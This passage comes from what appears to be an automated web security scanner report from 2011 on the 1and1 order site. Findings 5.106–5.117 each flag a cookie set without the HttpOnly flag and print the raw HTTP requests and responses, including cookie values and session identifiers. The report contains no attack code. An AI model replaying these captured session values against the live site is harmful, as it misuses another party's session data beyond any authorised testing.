Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:36:18 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5329a8951a3be400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Gtc;jsessionid=95BD9426A31E329257071B4E6CB7E89F.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.106. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Home HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=eshopupselling; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:11:AAABLtRYZ*3Z0AoL3q_g3EClOijRS1_a:1300642686957; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:38:02 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3c94c49b88c62400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Home;jsessionid=88C0CA51C2D94DE8253D95249E3E6457.TCpfix142a
Content-Length: 0
Content-Type: text/plain


5.107. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.108. http://order.1and1.com/xml/order/Hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Hosting HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:25:22 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=652e051eff6a6c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Hosting;jsessionid=5F1C91FBFCD4C8A93CF8EF891907E981.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.109. http://order.1and1.com/xml/order/Hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.110. http://order.1and1.com/xml/order/Instant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:23:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:37:28 GMT; Path=/
ETag: dbd3f57bd7c94c04d5bf8f590fd16409
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23827


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.111. http://order.1and1.com/xml/order/Instant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Instant HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:00 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=28664dbb52ba0400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Instant;jsessionid=2A0D610C961468C157FCB86204C22DAE.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.112. http://order.1and1.com/xml/order/International  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/International HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:59 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=352ad3850d1b6400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/International;jsessionid=B54269629CBCB82F834EAE06900D66FA.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.113. http://order.1and1.com/xml/order/International  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:07 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:52:14 GMT; Path=/
ETag: ff92e81d1737af4a2a56f9b3afc85af1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23585


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.114. http://order.1and1.com/xml/order/Jumpto  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:44 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:36:51 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


5.115. http://order.1and1.com/xml/order/Jumpto  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Jumpto HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:17 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4b847f0707b00000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Jumpto;jsessionid=4020004207DAA55734055298FFA83079.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.116. http://order.1and1.com/xml/order/LocalSubmission  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/LocalSubmission HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:09 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4f8da0fc7a41dc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/LocalSubmission;jsessionid=E2D01B25E56BB4F3D8C84DF8322C0493.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.117. http://order.1and1.com/xml/order/LocalSubmission  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.listlocal HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:25 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 21:48:32 GMT; Path=/
ETag: 9f251cbbda88124ff22e04dd6b22412a
Vary: Accept-Encoding
Connection: close
